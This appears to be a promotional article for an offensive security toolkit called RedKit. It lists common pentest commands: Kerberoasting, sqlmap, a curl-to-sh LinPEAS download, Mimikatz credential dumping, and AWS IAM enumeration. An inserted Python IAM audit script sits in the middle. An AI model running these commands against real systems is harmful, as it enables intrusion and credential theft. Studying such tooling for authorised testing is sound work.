
Introduction
RedKit is a modular offensive security toolkit designed to streamline penetration testing workflows by providing pre-defined commands for enumeration, exploitation, privilege escalation, and post-exploitation. Developed by Shay Giladi, this tool aims to eliminate the hassle of memorizing complex command flags, allowing security professionals to focus on execution and results.
Learning Objectives
- Understand the core functionalities of RedKit for offensive security.
- Learn key commands for Active Directory, web app testing, and privilege escalation.
- Discover how RedKit can optimize penetration testing efficiency.
1. Enumeration with RedKit
Command:
nmap -sV -sC -p- <target_IP> -oN scan_results.txt
What It Does:
This Nmap command performs a comprehensive scan of all ports (-p-), detects service versions (-sV), and runs default scripts (-sC), saving results to a file (-oN).
How to Use in RedKit:
RedKit can auto-fill target IPs and output formats, reducing manual input errors.
2. Active Directory Exploitation
Command (Impacket’s GetUserSPNs):
GetUserSPNs.py -request -dc-ip <DC_IP> DOMAIN/user:password
What It Does:
This Kerberoasting command enumerates accounts that have Service Principal Names (SPNs) registered and requests TGS tickets for those services, which can then be cracked offline.
RedKit Integration:
RedKit categorizes AD exploitation commands, allowing quick access to common attacks like Kerberoasting.
3. Web App Testing (SQL Injection)
Command (SQLmap):
sqlmap -u "http://target.com/page?id=1" --risk=3 --level=5 --batch
What It Does:
Automates SQL injection detection and exploitation with risk/level customization.
RedKit Advantage:
Pre-configured risk levels reduce the need for manual tuning.
4. Privilege Escalation (Linux)
Command (LinPEAS):
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
What It Does:
LinPEAS automates Linux privilege escalation checks.
RedKit Workflow:
RedKit can fetch and execute LinPEAS with a single click.
5. Post-Exploitation (Mimikatz)
Command:
Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'
What It Does:
Extracts plaintext credentials from memory in Windows environments.
RedKit Feature:
Pre-loaded Mimikatz commands simplify post-exploitation.
6. Cloud Hardening (AWS CLI)
Command:
aws iam get-account-authorization-details --query 'UserDetailList[].UserName'
What It Does:
Lists all IAM users in an AWS account for permission auditing.
RedKit’s Role:
RedKit can store and recall cloud security commands for rapid assessments.
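The page's AWS command only lists user names; an audit usually goes on to inspect each user's direct grants. The following is an added example (not RedKit's code or the author's) that parses the full JSON from `aws iam get-account-authorization-details`, using a constructed sample document with invented user names and ARNs, and flags users who hold admin-level permissions outside of group membership: inline policies allowing `*` on `*`, or the managed AdministratorAccess policy attached directly to the user.

```python
import json

# Constructed sample of `aws iam get-account-authorization-details` output,
# trimmed to the fields the audit reads. All names and ARNs are invented.
SAMPLE_AUTH_DETAILS = json.dumps({
    "UserDetailList": [
        {"UserName": "alice", "GroupList": ["Admins"],
         "UserPolicyList": [], "AttachedManagedPolicies": []},
        {"UserName": "build-bot", "GroupList": [],
         "UserPolicyList": [{"PolicyName": "inline-full",
                             "PolicyDocument": {"Version": "2012-10-17",
                                                "Statement": {"Effect": "Allow",
                                                              "Action": "*",
                                                              "Resource": "*"}}}],
         "AttachedManagedPolicies": []},
        {"UserName": "carol", "GroupList": [], "UserPolicyList": [],
         "AttachedManagedPolicies": [{"PolicyName": "AdministratorAccess",
                                      "PolicyArn": "arn:aws:iam::aws:policy/AdministratorAccess"}]},
    ]
})

def _as_list(value):
    # IAM allows Statement, Action and Resource to be a single item or a list.
    return value if isinstance(value, list) else [value]

def statement_is_wildcard(stmt):
    """True if an Allow statement grants every action on every resource."""
    if stmt.get("Effect") != "Allow":
        return False
    actions = _as_list(stmt.get("Action", []))
    resources = _as_list(stmt.get("Resource", []))
    return "*" in actions and "*" in resources

def audit_users(auth_details_json):
    """Return {user_name: [finding, ...]} for users with direct admin-level grants."""
    data = json.loads(auth_details_json)
    findings = {}
    for user in data.get("UserDetailList", []):
        issues = []
        for pol in user.get("UserPolicyList", []):
            stmts = _as_list(pol["PolicyDocument"].get("Statement", []))
            if any(statement_is_wildcard(s) for s in stmts):
                issues.append(f"inline policy {pol['PolicyName']} allows *:*")
        for pol in user.get("AttachedManagedPolicies", []):
            if pol["PolicyArn"].endswith("/AdministratorAccess"):
                issues.append("AdministratorAccess attached directly to user")
        if issues:
            findings[user["UserName"]] = issues
    return findings

if __name__ == "__main__":
    for name, issues in audit_users(SAMPLE_AUTH_DETAILS).items():
        print(f"{name}: {'; '.join(issues)}")
```

Against real output, feed the script the file written by `aws iam get-account-authorization-details --output json > details.json`; group and role policies are not inspected here and would need the same treatment.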
7. API Security Testing
Command (Burp Suite CLI):
java -jar burpsuite.jar --project-file=api_scan.burp --api-scan-target=http://api.target.com
What It Does:
Automates API security scans using Burp Suite.
RedKit Efficiency:
RedKit can integrate with Burp for one-click API testing.
What Undercode Say
- Key Takeaway 1: RedKit significantly reduces pentesting overhead by centralizing offensive commands.
- Key Takeaway 2: Its modular design allows future expansion into cloud, AI-driven attacks, and automation.
Analysis:
RedKit bridges the gap between manual testing and full automation, making it ideal for red teams and bug bounty hunters. As offensive security evolves, tools like RedKit will become essential for rapid, repeatable testing.
Prediction
With AI integration, RedKit could evolve into an intelligent assistant that suggests attack vectors based on target reconnaissance, further revolutionizing penetration testing. Expect wider adoption as the tool matures.
🔗 Get RedKit Here: https://lnkd.in/d8gnGKnF
Reported By: Shay Giladi – Hackers Feeds